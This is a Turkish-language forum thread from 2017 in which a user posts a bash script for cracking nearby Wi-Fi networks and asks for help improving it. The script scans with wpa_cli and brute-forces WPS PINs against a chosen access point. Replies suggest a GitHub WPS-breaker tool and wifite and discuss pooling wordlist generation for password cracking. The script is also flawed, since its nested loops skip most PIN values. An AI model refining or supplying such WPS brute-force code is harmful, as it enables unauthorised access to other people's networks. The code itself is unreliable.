1. Duyuruyu Kapat

Merhabalar Kodlamada Bana Yardımcı Olmanızı İstiyorum Acill

'Soru & Cevap' forumunda CcCOSMANLICcC tarafından 31 Ekim 2017 tarihinde açılan konu

1. CcCOSMANLICcC

CcCOSMANLICcC Member

Kod:
    #!/bin/bash

echo

echo "Wifi Şifre Kırma Bölümü";

echo

echo "--------------------------------------------------------------------------------------";

echo

echo "Etraftaki Ağlar Taranıyor...",;

echo

echo "--------------------------------------------------------------------------------------";

echo

wpa_cli scan

echo

echo

echo "Etraftaki Ağların Bilgileri...";

echo

wpa_cli scan_results

echo

echo

echo "Hedefteki Ağın Bilgilerini Eksiz Yazınız...";

echo

echo

echo -n "Wifi Ağ Adı : ";
    read ssid

echo " Wifi-Adı=$ssid " > wifibilgileri.txt

echo >> wifibilgileri.txt

echo

echo

echo -n "Wifi Mac Adresi : ";
    read bssid

echo " Wifi-Mac-Adresi=$bssid " >> wifibilgileri.txt
    echo >> wifibilgileri.txt

echo

echo "Forklama Başlıyor...";

echo

for pin1 in {1..9}
    do
    for pin2 in {2..9}
    do
    for pin3 in {3..9}
    do
    for pin4 in {4..9}
    do
    for pin5 in {5..9}
    do
    for pin6 in {6..9}
    do
    for pin7 in {7..9}
    do
    for pin8 in {0..9}
    do

sleep 2

echo "Wifi Adı : $ssid -- Wifi Mac ADresi : $bssid -- Wifi AP Pin : $pin1$pin2$pin3$pin4$pin5$pin6$pin7$pin8";

echo

wpa_cli wps_reg $bssid $pin1$pin2$pin3$pin4$pin5$pin6$pin7$pin8

echo

echo

done
    done
    done
    done
    done
    done
    done
    done

Ben böyle bir kod düzeni yaptım fakat pin denemeleri başarılı olup olmadığını nasıl anlayailirim sonra for do done kodlaması yerine birbirini takip etmemek şartıyla random sistemi nasıl ekleyebilirim lütfen yardımcı olurmusunuzun bana ?

2. CcCOSMANLICcC

CcCOSMANLICcC Member

20 Kişi bakmış ama kimse cevap vermemiş lütfen cevap vermenizi bekliyorum (Güya Arkadaşım Burayı Bana Bir Hayli Övmüştü)

3. el_hasibi

el_hasibi Member

şu şekilde olabilir açığı olan modem bulup pinini biliyorsan eğer scriptin çalışıyorsa başarılı olmuş olman gerekir

4. CcCOSMANLICcC

CcCOSMANLICcC Member

Ben wireless şifre kırma işleminde crunchdan wordlist yapıp denemeyi aynı anda yaptığı için yavaşladığını görerek bir havuz yapıp bu havuzda herkezin bilgisayarında belli bir miktarda ram kullanarak wordlist yaptırmayı ve lazım olan herkezin o havuzdan çekmesini istiyorum yani sadece bir kişide değil herkezde belli bir miktarda ramın bir bölümünü sunucuya cevirip olan wordlisti hem alabilme hemde yükleyebilme sistemi yapmayı düşünüyorum ama nasıl nereden başlayacağımı bilemiyorum yardım edermisiniz şimdiden teşekkür ederim

5. TosunPASA

TosunPASA Well-Known Member

önceki konunda wordlist ile ilgili yorum yaptım

yukardaki kodları istersen şu şekilde modifiye et

benim kali de kullandığım program sanırım bu... 1,5 seneyi geçti bakmayalı.. antenleri daha dün gördüm.. ya çevredekileri bir kontrole tsem diye düşündüm... ama sadece düşündüm.. dizi seyretmeye geri döndüm
    kali içinde wifite ismi olsa gerek.. benzer metod kullanıyor..

ama ben bunu baya beğenmiş idim. diğerlerine göre daha basit.. ayrıca kodları edit leyebilirsin ama benim yaptığım gibi ascii kodlarıda kaydırma yapmadan yap...

https://github.com/SilentGhostX/HT-WPS-Breaker

daha çok 1-2 metodunu kullandım.. nadir de olsa sonuç aldım.. diğerlerini pek anlamadm ve sonuç alamamış olabilirim...

tababa86 bunu beğendi.
  6. el_hasibi

el_hasibi Member

Kodlarını tekrar inceledim de şu mantıkla hareket etmişsin

önce 1'den 9 a bir rakam seç onu seçtikten sonra 2'den 9 a onu seçtikten sonra 3'ten 9'a diye devam ediyor permutasyon gibi. Fakat uygun wps pinini bulana kadar bir haftan geçebilir ki pcin hızlı değilse fena yani bu mantığı biraz daha geliştirmelisin düşünsene uygun 9 haneli wps kodunu bulmak için kaç seçim yapılmalı..

7. CcCOSMANLICcC

CcCOSMANLICcC Member

@el_hasibi bakın ben nfs ile dosyayı farklı ağlardaki bilgisayarlara nasıl paylaşabilirim ?

8. Irrelevant

Irrelevant Member

Bknz : Soket Programlama

Bu Sayfayı Paylaş

Share